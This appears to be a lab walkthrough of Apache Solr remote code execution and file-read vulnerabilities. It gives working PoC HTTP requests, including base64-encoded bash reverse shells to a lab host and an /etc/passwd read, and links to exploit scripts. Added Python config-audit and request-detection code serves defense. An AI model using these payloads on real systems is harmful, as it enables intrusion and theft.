Apache Solr is roughly the counterpart of Elasticsearch: an open-source search engine. Solr is written in Java, built mainly on HTTP and Apache Lucene, and listens on port 8983. In outline, documents are added to a search collection over HTTP as XML, and the collection is queried over HTTP as well, returning an XML/JSON response.
curl 'http://192.168.171.139:8983/solr/demo/select?q=*:*'
curl 'http://192.168.171.139:8983/solr/demo/select?q=id:GB18030TEST'
Affected versions:
Before 7.1.0
PoC:
POST /solr/demo/config HTTP/1.1
Host: 192.168.171.139:8983
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 160

{"add-listener":{"event":"newSearcher","name":"newlistener11","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","touch /tmp/success"]}}
Reverse shell:
POST /solr/demo/config HTTP/1.1
Host: 192.168.171.139:8983
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 236

{"add-listener":{"event":"newSearcher","name":"newlistener11212","class":"solr.RunExecutableListener","exe":"bash","dir":"/bin/","args":["-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}"]}}
Affected versions:
Apache Solr < 8.2.0
http://192.168.171.139:8983/solr/admin/cores
Send the following request:
POST /solr/test/dataimport?_=1565835261600&indent=on&wt=json HTTP/1.1
Host: 192.168.171.139:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 679
Connection: close
Referer: http://localhost:8983/solr/
COOKIE: csrftoken=gzcSR6Sj3SWd3v4ZxmV5OcZuPKbOhI6CMpgp5vIMvr5wQAL4stMtxJqL2sUE8INi; sessionid=snzojzqa5zn187oghf06z6xodulpohpr

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
This creates the file success under /tmp:
Reverse shell:
POST /solr/test/dataimport?_=1638356269667&indent=on&wt=json HTTP/1.1
Host: 192.168.171.139:8983
Content-Length: 782
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-type: application/x-www-form-urlencoded
Origin: http://192.168.171.139:8983
Referer: http://192.168.171.139:8983/solr/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
The command injected here must be base64-encoded, because Java's exec does not handle the > symbol (it starts the program directly rather than through a shell), so the command has to be rewritten into a form without such characters and that form then base64-encoded.
An exploit script is also available:
https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192/blob/master/solr_RCE.py
In versions 5.0.0 through 8.3.1, a user can inject a custom template and execute arbitrary commands through the Velocity template language.
First identify the core:
curl http://192.168.171.139:8983/solr/admin/cores
The core is found to be named demo.
By default the params.resource.loader.enabled setting is off, so custom templates cannot be used. Sending the following request turns it on in the configuration of the target core:
POST /solr/demo/config HTTP/1.1
Host: 192.168.171.139:8983
Content-Type: application/json
Content-Length: 259

{"update-queryresponsewriter": {"startup": "lazy","name": "velocity","class": "solr.VelocityResponseWriter","template.base.dir": "","solr.resource.loader.enabled": "true","params.resource.loader.enabled": "true"}
}
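Because these changes are persisted through the Config API, the same API can be read back to find them: GET /solr/<core>/config returns the live configuration of a core. The Python below is an added example, not code from this page or from the Solr project. It audits a constructed config response for the three settings this page switches on: the RunExecutableListener added by the first request above, the params.resource.loader.enabled flag just set on the Velocity writer, and the enableRemoteStreaming property used further down the page. The JSON key layout (listener, queryResponseWriter, requestDispatcher) is an assumption modelled on the Config API response; compare it with a real core's output before relying on it.

```python
"""Audit one Solr core's Config API response for the settings this page turns
on: a RunExecutableListener, the Velocity params loader, and remote streaming.
Added example; not code from the page or from the Solr project."""
import json

# Constructed sample shaped like the body of `GET /solr/<core>/config` after
# the Config API requests shown on this page have been applied. The key layout
# ("listener", "queryResponseWriter", "requestDispatcher") is an assumption
# modelled on the Config API; check it against a real response.
SAMPLE_CONFIG = json.dumps({
    "responseHeader": {"status": 0, "QTime": 1},
    "config": {
        "listener": [
            {"event": "newSearcher", "name": "newlistener11",
             "class": "solr.RunExecutableListener", "exe": "sh", "dir": "/bin/",
             "args": ["-c", "touch /tmp/success"]},
            {"event": "firstSearcher", "class": "solr.QuerySenderListener"},
        ],
        "queryResponseWriter": {
            "json": {"class": "solr.JSONResponseWriter"},
            "velocity": {"startup": "lazy", "class": "solr.VelocityResponseWriter",
                         "solr.resource.loader.enabled": "true",
                         "params.resource.loader.enabled": "true"},
        },
        "requestDispatcher": {
            "requestParsers": {"enableRemoteStreaming": True,
                               "enableStreamBody": False},
        },
    },
})


def _is_true(value):
    """Config values arrive as JSON booleans or as the strings "true"/"false"."""
    return value is True or str(value).strip().lower() == "true"


def audit_config(config_json):
    """Return (severity, message) findings for one core's config JSON."""
    cfg = json.loads(config_json).get("config", {})
    findings = []

    # 1. Any RunExecutableListener turns a config change into code execution.
    for listener in cfg.get("listener", []):
        if listener.get("class", "").endswith("RunExecutableListener"):
            findings.append(("high",
                "listener %r on event %r runs %s with args %r" % (
                    listener.get("name", "<unnamed>"), listener.get("event"),
                    listener.get("exe"), listener.get("args"))))

    # 2. A Velocity writer with the params loader on accepts templates from the
    #    request itself (v.template.custom), which is the injection path.
    for name, writer in cfg.get("queryResponseWriter", {}).items():
        if (writer.get("class", "").endswith("VelocityResponseWriter")
                and _is_true(writer.get("params.resource.loader.enabled"))):
            findings.append(("high",
                "response writer %r accepts request-supplied Velocity templates" % name))

    # 3. Remote streaming lets stream.url fetch file:// and remote URLs.
    parsers = cfg.get("requestDispatcher", {}).get("requestParsers", {})
    if _is_true(parsers.get("enableRemoteStreaming")):
        findings.append(("medium",
            "enableRemoteStreaming is on; stream.url can read local files"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_config(SAMPLE_CONFIG):
        print("[%s] %s" % (severity, message))
```

Run it against each core listed by /solr/admin/cores; a clean core returns no findings, and a RunExecutableListener or a Velocity writer with the params loader enabled is worth treating as an incident rather than a misconfiguration, since neither is something a normal deployment needs.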
Execute a command:
GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 192.168.171.139:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Reverse shell:
GET /solr/demo/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%22bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xLzk5OTkgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%22))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: 192.168.171.139:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
An exploit can also be used directly:
https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template
# Get the core name; here assume the core returned is demo
curl 'http://192.168.171.139:8983/solr/admin/cores?indexInfo=false&wt=json' | grep name
# Enable RemoteStreaming
curl -i -s -k -X $'POST' \
  -H $'Content-Type: application/json' \
  --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \
  $'http://192.168.171.139:8983/solr/demo/config'
# Read /etc/passwd
curl -i -s -k 'http://192.168.171.139:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'
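From the defender's side, every request this page walks through leaves a recognisable trace: a Config API POST carrying RunExecutableListener, the Velocity params-loader switch or the enableRemoteStreaming property; a dataimport request whose dataConfig carries a <script> block; a select with wt=velocity and an inline v.template.custom; or a stream.url pointing at file://. The Python below is an added example, not code from this page or from the Solr project. It runs those rules over constructed request records; the (method, request-target, body) shape is an assumption about what a reverse proxy or WAF with body logging would hand you, and the sample capture itself is made up, modelled on the requests shown above.

```python
"""Flag the Solr request patterns this page walks through in captured HTTP
requests. Added example, not code from the page or from the Solr project."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed (method, request-target, body) records, the way a reverse proxy
# or WAF that logs request bodies would capture them. Solr's own Jetty request
# log records only the request line, so the POST-body rules below need such a
# capture; the GET-based rules work on the request log alone.
SAMPLE_REQUESTS = [
    ("GET", "/solr/demo/select?q=*:*", ""),
    ("POST", "/solr/demo/config",
     '{"add-listener":{"event":"newSearcher","name":"x","class":'
     '"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c","id"]}}'),
    ("POST", "/solr/test/dataimport?indent=on&wt=json",
     "command=full-import&core=test&dataConfig=%3CdataConfig%3E%3Cscript%3E"
     "%3C!%5BCDATA%5Bfunction+poc()%7B%7D%5D%5D%3E%3C%2Fscript%3E%3C%2FdataConfig%3E"
     "&name=dataimport"),
    ("POST", "/solr/demo/config",
     '{"update-queryresponsewriter": {"name": "velocity", "class": '
     '"solr.VelocityResponseWriter", "params.resource.loader.enabled": "true"}}'),
    ("GET", "/solr/demo/select?q=1&wt=velocity&v.template=custom"
            "&v.template.custom=%23set($x%3D%27%27)", ""),
    ("POST", "/solr/demo/config",
     '{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'),
    ("GET", "/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd", ""),
]


def classify(method, target, body):
    """Return the names of every rule that matches one request record.
    `method` is kept so records can be passed through unchanged."""
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)
    # Form bodies are percent-encoded like the query string; decode once so the
    # rules below match on the plain text that Solr will actually see.
    text = unquote_plus(body)
    hits = []

    if url.path.endswith("/config"):          # Config API changes
        if "RunExecutableListener" in text:
            hits.append("config-api-run-executable-listener")
        if re.search(r'params\.resource\.loader\.enabled"\s*:\s*"?true', text):
            hits.append("config-api-enable-velocity-params-loader")
        if re.search(r"enableRemoteStreaming\W*true", text):
            hits.append("config-api-enable-remote-streaming")

    # DataImportHandler: a <script> block inside dataConfig is the transformer
    # that the exploit above uses to reach Runtime.exec.
    if "/dataimport" in url.path and "<script" in text.lower():
        hits.append("dataimport-script-transformer")

    # Velocity writer with a template supplied in the request itself.
    if query.get("wt", [""])[0] == "velocity" and any(
            k.startswith("v.template") for k in query):
        hits.append("velocity-inline-template")

    # Remote streaming pointed at the local filesystem.
    stream_urls = query.get("stream.url", []) + re.findall(r"stream\.url=([^&\s]+)", text)
    if any(u.lower().startswith("file:") for u in stream_urls):
        hits.append("remote-streaming-local-file")
    return hits


def scan(requests):
    """Map request index -> matched rules, skipping requests with no hits."""
    result = {}
    for index, record in enumerate(requests):
        hits = classify(*record)
        if hits:
            result[index] = hits
    return result


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_REQUESTS).items():
        method, target, _ = SAMPLE_REQUESTS[index]
        print("%s %s -> %s" % (method, target, ", ".join(hits)))
```

The Config API rules are the most valuable ones: a legitimate deployment changes solrconfig through its deployment pipeline, so any POST to /solr/<core>/config from a client that is not that pipeline deserves an alert on its own, before looking at the body.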
vulhub
Apache-Solr-RCE collection